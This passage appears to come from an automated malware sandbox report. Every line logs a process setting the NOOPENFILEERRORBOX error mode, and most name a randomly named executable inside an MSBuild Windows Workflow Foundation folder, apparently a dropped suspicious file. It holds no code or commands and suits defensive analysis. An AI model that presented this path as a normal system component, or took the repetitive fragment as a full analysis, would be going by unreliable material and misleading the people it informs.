                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess information set: NOOPENFILEERRORBOX
